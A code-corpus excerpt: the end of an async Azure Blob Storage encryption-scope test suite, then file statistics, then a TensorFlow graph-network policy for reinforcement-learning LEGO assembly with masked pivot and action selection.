permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
blob_client = await self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = await blob_client.upload_pages_from_url(source_blob_url,
offset=0,
length=len(self.byte_data),
source_offset=0,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_page_blob_with_chunks(self, resource_group, location, storage_account, storage_account_key):
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
# Act
blob_client = bsc.get_blob_client(self.container_name, self._get_blob_reference())
page_blob_prop = await blob_client.upload_blob(self.byte_data,
blob_type=BlobType.PageBlob,
max_concurrency=2,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_get_set_blob_metadata(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client, _ = await self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
blob_props = await blob_client.get_blob_properties()
# Assert
self.assertTrue(blob_props.server_encrypted)
self.assertEqual(blob_props.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
        # Act: set blob metadata
metadata = {'hello': 'world', 'number': '42', 'up': 'upval'}
with self.assertRaises(HttpResponseError):
await blob_client.set_blob_metadata(
metadata=metadata,
)
await blob_client.set_blob_metadata(metadata=metadata, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
blob_props = await blob_client.get_blob_properties()
md = blob_props.metadata
self.assertEqual(3, len(md))
self.assertEqual(md['hello'], 'world')
self.assertEqual(md['number'], '42')
self.assertEqual(md['up'], 'upval')
self.assertFalse('Up' in md)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_snapshot_blob(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client, _ = await self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Act: creating a snapshot without the encryption scope should fail
with self.assertRaises(HttpResponseError):
await blob_client.create_snapshot()
        # Act: with the encryption scope, the snapshot should succeed
blob_snapshot = await blob_client.create_snapshot(encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(blob_snapshot)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_list_blobs(self, resource_group, location, storage_account, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
await self._setup(bsc)
blob_client, _ = await self._create_block_blob(bsc, blob_name="blockblob", data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
await self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
container_client = bsc.get_container_client(self.container_name)
generator = container_client.list_blobs(include="metadata")
async for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
self.assertEqual(blob.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_container_with_default_cpk_n(self, resource_group, location, storage_account,
storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = await bsc.create_container(
'asynccpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE)
container_props = await container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
        async for container in bsc.list_containers(name_starts_with='asynccpkcontainer'):
            self.assertEqual(
                container.encryption_scope.default_encryption_scope,
                TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
            self.assertEqual(container.encryption_scope.prevent_encryption_scope_override, False)
blob_client = container_client.get_blob_client("appendblob")
        # Provide an encryption scope when uploading the blob
resp = await blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # The response should reflect the provided encryption scope
self.assertEqual(resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
await container_client.delete_container()
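    # For reference, a minimal sketch of how the container-scope constants used
    # above are typically constructed (assuming azure.storage.blob's
    # ContainerEncryptionScope model; the scope name is a placeholder):
    #
    #   from azure.storage.blob import ContainerEncryptionScope
    #   TEST_CONTAINER_ENCRYPTION_KEY_SCOPE = ContainerEncryptionScope(
    #       default_encryption_scope="containerscope")
    #   TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE = ContainerEncryptionScope(
    #       default_encryption_scope="containerscope",
    #       prevent_encryption_scope_override=True)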
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_container_with_default_cpk_n_deny_override(self, resource_group, location, storage_account,
storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = await bsc.create_container(
'asyncdenyoverridecpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE
)
container_props = await container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
        async for container in bsc.list_containers(name_starts_with='asyncdenyoverridecpkcontainer'):
            self.assertEqual(
                container.encryption_scope.default_encryption_scope,
                TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
            self.assertEqual(container.encryption_scope.prevent_encryption_scope_override, True)
blob_client = container_client.get_blob_client("appendblob")
        # Setting an encryption scope on the blob is not allowed when the
        # container denies encryption scope override.
with self.assertRaises(HttpResponseError):
await blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
resp = await blob_client.upload_blob(b'aaaa', BlobType.AppendBlob)
self.assertEqual(resp['encryption_scope'], TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
await container_client.delete_container()
| 48.746667
| 145
| 0.678993
| 4,110
| 36,560
| 5.677129
| 0.07129
| 0.062358
| 0.050144
| 0.052801
| 0.858312
| 0.843741
| 0.831998
| 0.813226
| 0.790683
| 0.771825
| 0
| 0.014709
| 0.241302
| 36,560
| 749
| 146
| 48.811749
| 0.826484
| 0.11198
| 0
| 0.737736
| 0
| 0
| 0.038647
| 0.011718
| 0
| 0
| 0
| 0
| 0.192453
| 1
| 0.003774
| false
| 0.001887
| 0.018868
| 0.001887
| 0.037736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ab7308e720e0536a0d4fbb99d86f33047e19b51
| 49,357
|
py
|
Python
|
src/baselines/common/lego_policies_artificial_mask_pretrain.py
|
POSTECH-CVLab/Brick-by-Brick
|
b000f98f04c17d6f59bb4f0144b997583c479e2a
|
[
"MIT"
] | 3
|
2022-01-23T14:14:36.000Z
|
2022-02-21T14:41:31.000Z
|
src/baselines/common/lego_policies_artificial_mask_pretrain.py
|
POSTECH-CVLab/Brick-by-Brick
|
b000f98f04c17d6f59bb4f0144b997583c479e2a
|
[
"MIT"
] | null | null | null |
src/baselines/common/lego_policies_artificial_mask_pretrain.py
|
POSTECH-CVLab/Brick-by-Brick
|
b000f98f04c17d6f59bb4f0144b997583c479e2a
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
from baselines.a2c.utils import fc, fc_relu, conv, ortho_init, fc_sigmoid
from baselines.common.distributions import make_pdtype
import gym
import numpy as np
class Init_FC(tf.keras.Model):
def __init__(self, hidden_dim=64, init_dim = 4, target_dim = 192, layer_type=0, layer_num=0):
super(Init_FC, self).__init__()
self.fc0 = fc_relu(init_dim + target_dim, 'init_{}_fc0_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
self.fc1 = fc_relu(hidden_dim + target_dim, 'init_{}_fc1_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
# self.fc2 = fc_relu(hidden_dim + target_dim, 'init_{}_fc2_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
self.fc2 = fc(hidden_dim + target_dim, 'init_{}_fc2_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
def call(self, init_feature, target_feature):
x = self.fc0(tf.concat([init_feature, target_feature], axis=-1))
x = self.fc1(tf.concat([x, target_feature], axis=-1))
x = self.fc2(tf.concat([x, target_feature], axis=-1))
return x
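# Usage sketch for Init_FC (shapes are illustrative, not taken from this file):
#   init_fc = Init_FC(hidden_dim=64, init_dim=4, target_dim=192)
#   h = init_fc(node_feats, tiled_target)   # (B, N, 4) + (B, N, 192) -> (B, N, 64)
# The target embedding is re-concatenated before every layer so the
# conditioning signal is not washed out with depth.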
class Init_FC_No_Target(tf.keras.Model):
def __init__(self, hidden_dim=64, init_dim = 4, layer_type=0, layer_num=0):
super(Init_FC_No_Target, self).__init__()
self.fc0 = fc_relu(init_dim, 'init_{}_fc0_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
self.fc1 = fc_relu(hidden_dim, 'init_{}_fc1_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
self.fc2 = fc_relu(hidden_dim, 'init_{}_fc2_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
def call(self, init_feature):
x = self.fc0(init_feature)
x = self.fc1(x)
x = self.fc2(x)
return x
class Lego_Message_Passing_Artificial(tf.keras.Model):
def __init__(self, policy_network=None, hidden_dim=64, node_dim = 4, target_info_dim=4, edge_dim=4, layer_num=0):
super(Lego_Message_Passing_Artificial, self).__init__()
# self.message_fc = policy_network or fc_relu(hidden_dim + hidden_dim + edge_dim, 'msg_fc_{}'.format(int(layer_num)),
# hidden_dim, init_scale=np.sqrt(2))
# self.feature_fc = fc_relu(hidden_dim + node_dim + target_info_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.feature_fc = fc_relu(hidden_dim + node_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
# self.edge_fc = fc_relu(node_dim + node_dim + edge_dim + target_info_dim, 'edge_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.edge_fc = fc_relu(node_dim + node_dim + edge_dim, 'edge_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
def call(self, node_feature, adjacency, target_information, edge_feature, node_mask, training=True):
tiled_node_feature = tf.tile(tf.expand_dims(node_feature, axis=1), (1, node_feature.shape[1], 1, 1))
node_node_feature = tf.concat((tf.transpose(tiled_node_feature, (0, 2, 1, 3)), tiled_node_feature), axis=-1)
# edge_feature = self.edge_fc(tf.concat((node_node_feature, edge_feature, two_tiled_target_information), axis=-1))
edge_feature = self.edge_fc(tf.concat((node_node_feature, edge_feature), axis=-1))
# message = tf.reduce_sum(tf.math.multiply(self.message_fc(tf.concat((node_node_feature, edge_feature), axis=-1)), adjacency[..., None]), axis=2)
message = tf.reduce_sum(tf.math.multiply(edge_feature, adjacency[..., None]), axis=2)
'''Shape : (num_envs, max_node, hidden_dim)'''
# ending_feature = self.feature_fc(tf.concat([message, node_feature, tiled_target_information], axis=-1))
ending_feature = self.feature_fc(tf.concat([message, node_feature], axis=-1))
target_feature = target_information
return ending_feature, edge_feature, target_feature
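# A compact summary of the message-passing step implemented in call() above:
# for nodes i, j with states h_i, h_j, edge features e_ij and adjacency A,
#   e'_ij = ReLU(W_e [h_i ; h_j ; e_ij])   (edge update)
#   m_i   = sum_j A_ij * e'_ij             (aggregation over neighbours)
#   h'_i  = ReLU(W_f [m_i ; h_i])          (node update)
# The target embedding is carried through unchanged.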
class PolicyWithValue_Lego_Artificial(tf.Module):
"""
Encapsulates fields and methods for RL policy and value function estimation with shared parameters
"""
def __init__(self, ac_space, policy_network, target_network, hidden_dim, target_hidden_dim, value_network=None, estimate_q=False):
"""
Parameters:
----------
ac_space action space
policy_network keras network for policy
value_network keras network for value
estimate_q q value or v value
"""
self.estimate_q = estimate_q
self.initial_state = None
self.target_network = target_network
# hidden_dim = 64
reshaped_hidden_dim = hidden_dim * 3
target_init_dim = 3
# target_hidden_dim = 64 * 3
reshaped_target_hidden_dim = target_hidden_dim * 3
edge_init_dim = 4
self.init_node_fc = Init_FC(layer_type=0, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.init_edge_fc = Init_FC(layer_type=1, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
# self.gcn_init = Lego_Message_Passing_Artificial(policy_network, node_dim=hidden_dim, hidden_dim=hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=hidden_dim, layer_num=1)
self.gcn_init = Lego_Message_Passing_Artificial(policy_network, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.gcn_block = []
for i in range(2):
# temp_gcn = Lego_Message_Passing_Artificial(node_dim=hidden_dim, hidden_dim=hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=hidden_dim, layer_num=i+2)
temp_gcn = Lego_Message_Passing_Artificial(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.gcn_block.append(temp_gcn)
self.pivot_classifier = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'piv', 1, init_scale=np.sqrt(2))
# Based on the action space, will select what probability distribution type
self.pdtype = make_pdtype((None, reshaped_hidden_dim + reshaped_target_hidden_dim), ac_space, init_scale=np.sqrt(2))
if estimate_q:
assert isinstance(ac_space, gym.spaces.Discrete)
self.value_fc = fc(hidden_dim, 'q', ac_space.n, init_scale=np.sqrt(2))
else:
self.value_fc = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'vf', 1, init_scale=np.sqrt(2))
@tf.function
def step(self, observation, pivot_mask, offset_mask, training=True):
"""
Compute next action(s) given the observation(s)
Parameters:
----------
observation batched observation data
Returns:
-------
(action, value estimate, next state, negative log likelihood of the action under current policy parameters) tuple
"""
node_feature, adjacency, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
two_tiled_target_information = tf.tile(tf.expand_dims(tiled_target_information, axis=1), (1, edge_feature.shape[1], 1, 1))
edge_feature = self.init_edge_fc(edge_feature, two_tiled_target_information)
node_feature, edge_feature, reshaped_target_information = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
node_feature, edge_feature, reshaped_target_information = self.gcn_block[i](node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
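        # Masked mean pooling: node_mask zeroes out padded slots, so the sum is
        # divided by each graph's true node count rather than by max_node.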
global_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# global_graph_feature = tf.reduce_sum(tf.multiply(node_feature, node_mask), axis = 1)
for_pivot_node_logits = tf.squeeze(self.pivot_classifier(tf.concat([node_feature, tiled_target_information], axis=-1)), axis=2)
squeezed_node_mask = tf.squeeze(node_mask, axis=-1)
squeezed_pivot_mask = tf.cast(tf.math.multiply(tf.squeeze(pivot_mask, axis=-1), squeezed_node_mask), tf.float32)
negative_node_mask = tf.cast((tf.ones_like(squeezed_node_mask) - squeezed_node_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
negative_pivot_mask = tf.cast((tf.ones_like(squeezed_pivot_mask) - squeezed_pivot_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
masked_for_pivot_node_logits = for_pivot_node_logits + negative_pivot_mask
pivot_node_index = tf.random.categorical(masked_for_pivot_node_logits, 1)
pivot_cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
pivot_probs = tf.nn.softmax(masked_for_pivot_node_logits, axis=-1)
pivot_neglogp = pivot_cce(y_true=tf.one_hot(pivot_node_index, for_pivot_node_logits.shape[-1]), y_pred=pivot_probs)
node_latent_representation = []
for i in range(node_feature.shape[0]):
node_latent_representation.append(node_feature[i][tf.squeeze(pivot_node_index)[i]])
'''Shape : (num_envs, hidden_dim)'''
node_latent_representation = tf.stack(node_latent_representation)
per_pivot_available_actions = []
for i in range(node_feature.shape[0]):
per_pivot_available_actions.append(offset_mask[i][tf.squeeze(pivot_node_index)[i]])
per_pivot_available_actions = tf.stack(per_pivot_available_actions)
pd, pi = self.pdtype.pdfromlatent(tf.concat([node_latent_representation, reshaped_target_information], axis=-1))
negative_logits_mask = (tf.ones_like(per_pivot_available_actions) - per_pivot_available_actions) * int(-1e8)
masked_action_logits = pi + tf.cast(negative_logits_mask, pi.dtype)
action = tf.random.categorical(masked_action_logits, 1)
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
probs = tf.nn.softmax(masked_action_logits, axis=-1)
neglogp = cce(y_true=tf.one_hot(action, pi.shape[-1]), y_pred=probs)
vf = tf.squeeze(self.value_fc(tf.concat([global_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return tf.cast(action, dtype=tf.int32), vf, None, neglogp, pivot_neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
@tf.function
def value(self, observation):
"""
Compute value estimate(s) given the observation(s)
Parameters:
----------
observation observation data (either single or a batch)
Returns:
-------
value estimate
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
two_tiled_target_information = tf.tile(tf.expand_dims(tiled_target_information, axis=1), (1, edge_feature.shape[1], 1, 1))
edge_feature = self.init_edge_fc(edge_feature, two_tiled_target_information)
node_feature, edge_feature, reshaped_target_information = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
node_feature, edge_feature, reshaped_target_information = self.gcn_block[i](node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
global_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# global_graph_feature = tf.reduce_sum(tf.multiply(node_feature, node_mask), axis = 1)
result = tf.squeeze(self.value_fc(tf.concat([global_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return result
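# The two sampling heads above share one pattern: add a large negative value to
# the logits of invalid entries, sample from the resulting categorical, and
# score the sample. A minimal standalone sketch of that pattern (illustrative
# names; functionally equivalent to the CategoricalCrossentropy-based neglogp
# computation used in step()):
def _sample_masked(logits, mask):
    """Sample one index per row from `logits`, restricted to entries where
    `mask` is 1. Returns the index and its negative log-probability."""
    mask = tf.cast(mask, logits.dtype)
    masked = logits + (1.0 - mask) * -1e8            # suppress invalid slots
    idx = tf.random.categorical(masked, 1)           # (batch, 1), int64
    probs = tf.nn.softmax(masked, axis=-1)
    picked = tf.gather(probs, idx, batch_dims=1)     # prob of the sampled index
    return idx, -tf.math.log(tf.squeeze(picked, axis=-1))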
class Lego_Message_Passing_Artificial_MultiGNN(tf.keras.Model):
def __init__(self, policy_network=None, hidden_dim=64, node_dim = 4, target_info_dim=4, edge_dim=4, layer_num=0):
super(Lego_Message_Passing_Artificial_MultiGNN, self).__init__()
# self.feature_fc = fc_relu(hidden_dim + node_dim + target_info_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.feature_fc = fc_relu(hidden_dim + node_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
# self.edge_fc = fc_relu(node_dim + node_dim + edge_dim + target_info_dim, 'edge_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.edge_fc = fc_relu(node_dim + node_dim + edge_dim, 'edge_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
def call(self, node_feature, adjacency, target_information, edge_feature, node_mask, training=True):
tiled_node_feature = tf.tile(tf.expand_dims(node_feature, axis=1), (1, node_feature.shape[1], 1, 1))
node_node_feature = tf.concat((tf.transpose(tiled_node_feature, (0, 2, 1, 3)), tiled_node_feature), axis=-1)
# edge_feature = self.edge_fc(tf.concat((node_node_feature, edge_feature, two_tiled_target_information), axis=-1))
edge_feature = self.edge_fc(tf.concat((node_node_feature, edge_feature), axis=-1))
# message = tf.reduce_sum(tf.math.multiply(self.message_fc(tf.concat((node_node_feature, edge_feature), axis=-1)), adjacency[..., None]), axis=2)
message = tf.reduce_sum(tf.math.multiply(edge_feature, adjacency[..., None]), axis=2)
'''Shape : (num_envs, max_node, hidden_dim)'''
# ending_feature = self.feature_fc(tf.concat([message, node_feature, tiled_target_information], axis=-1))
ending_feature = self.feature_fc(tf.concat([message, node_feature], axis=-1))
return ending_feature, edge_feature
class PolicyWithValue_Lego_Artificial_MultiGNN(tf.Module):
"""
Encapsulates fields and methods for RL policy and value function estimation with shared parameters
"""
def __init__(self, ac_space, policy_network, target_network, hidden_dim, target_hidden_dim, value_network=None, estimate_q=False):
"""
Parameters:
----------
ac_space action space
policy_network keras network for policy
value_network keras network for value
estimate_q q value or v value
"""
self.estimate_q = estimate_q
self.initial_state = None
self.target_network = target_network
# hidden_dim = 64
reshaped_hidden_dim = hidden_dim * 3
target_init_dim = 3
# target_hidden_dim = 64 * 3
reshaped_target_hidden_dim = target_hidden_dim * 3
edge_init_dim = 4
self.init_node_fc = Init_FC(layer_type=0, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.init_edge_fc = Init_FC(layer_type=1, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.gcn_init = Lego_Message_Passing_Artificial_MultiGNN(policy_network, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.gcn_block = []
for i in range(2):
temp_gcn = Lego_Message_Passing_Artificial_MultiGNN(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.gcn_block.append(temp_gcn)
self.pivot_gcn_init = Lego_Message_Passing_Artificial_MultiGNN(policy_network=None, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.pivot_gcn_block = []
for i in range(2):
temp_gcn = Lego_Message_Passing_Artificial_MultiGNN(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.pivot_gcn_block.append(temp_gcn)
self.pivot_classifier = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'piv', 1, init_scale=np.sqrt(2))
# Based on the action space, will select what probability distribution type
self.pdtype = make_pdtype((None, reshaped_hidden_dim + reshaped_target_hidden_dim), ac_space, init_scale=np.sqrt(2))
if estimate_q:
assert isinstance(ac_space, gym.spaces.Discrete)
self.value_fc = fc(hidden_dim, 'q', ac_space.n, init_scale=np.sqrt(2))
else:
self.value_fc = fc(reshaped_hidden_dim + reshaped_hidden_dim + reshaped_target_hidden_dim, 'vf', 1, init_scale=np.sqrt(2))
@tf.function
def step(self, observation, pivot_mask, offset_mask, training=True):
"""
Compute next action(s) given the observation(s)
Parameters:
----------
observation batched observation data
Returns:
-------
(action, value estimate, next state, negative log likelihood of the action under current policy parameters) tuple
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
two_tiled_target_information = tf.tile(tf.expand_dims(tiled_target_information, axis=1), (1, edge_feature.shape[1], 1, 1))
edge_feature = self.init_edge_fc(edge_feature, two_tiled_target_information)
action_node_feature, action_edge_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature, action_edge_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, action_edge_feature, node_mask)
pivot_node_feature, pivot_edge_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature, pivot_edge_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, pivot_edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# action_graph_feature = tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1)
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# pivot_graph_feature = tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1)
